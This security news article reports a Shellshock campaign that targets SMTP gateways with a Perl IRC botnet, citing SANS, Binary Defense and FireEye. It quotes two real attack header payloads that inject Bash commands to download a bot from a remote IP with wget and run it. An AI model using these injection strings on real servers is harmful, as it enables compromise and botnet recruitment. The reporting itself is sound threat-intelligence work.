Experts at SANS discovered a Shellshock SMTP Botnet Campaign

The experts at SANS Internet Storm Center experts discovered a a new Shellshock Botnet campaign that is targeting SMTP gateways worldwide.

A new wave of attacks exploiting the ShellShock flaw is targeting the SMTP servers worldwide, according to a post published by the  SANS Internet Storm Center. The SANS explained that the payload is an IRC Perl bot with simple DDoS commands that could be used to fetch and execute additional malicious code.

The new Shellshock campaign is targeting SMTP gateways, searching for vulnerable MTAs / MDAs, the attackers use to hide the malicious code into the message’s headers.

The attackers are including the following code in several message fields, including the “To:” field, “From:” field, “Subject” field, “Date:” field, “Message ID:” and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

The Shellshock vulnerability is continuing to create problems more than a month after it was publicly disclosed, threat actors are exploiting the BashBug vulnerability to serve a malicious a perl script onto targeted machines.

The script is used by attackers to recruit the computer in a botnet that receives is controlled over IRC, said a post on the Binary Defense Systems website.

“The attack leverages Shellshock as a main attack vector through the subject, body, to, from fields,” is reported on the Binary Defense Systems website. “Once compromised, a perl botnet is activated and beaconing on IRC for further instructions.” 

In the following image is reported the original email used in the attacks and containing the initial ShellShock payload:

“It’s unknown which product would specifically be vulnerable to this since Shellshock relies on system level calls and leveraging bash however it seems to be a fairly wide-scale delivery of emails across the United States,” BDS added.

Security experts have detected numerous attacks worldwide that were exploiting the Shellshock flaw, including attacks against VOIP systems and campaign to spread the malware like the Mayhem botnet.

A honeypot run by experts at AlienVault Labs has detected two separate strains of malware attempting to exploit the ShellShock vulnerability just 24 hours of the disclosure.

In September, security experts at researchers at FireEye published details on several proof-of-concept scripts which exploit the Shellshock bug.

“We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise,” FireEye wrote.

As explained many times, many hidden functions on Linux/Unix-based systems could be affected because they may invoke the flawed Bash, it is quite complex to patch the overall amount of the vulnerable machine in a short time, and cyber criminals know this.

The situation is particularly critical for the Internet of Thinks devices, for which in many cases isn’t available an upgrade or it is impossible to apply any update.

[adrotate banner=”9″]

Pierluigi Paganini

Security Affairs –  (Shellshock , SMTP)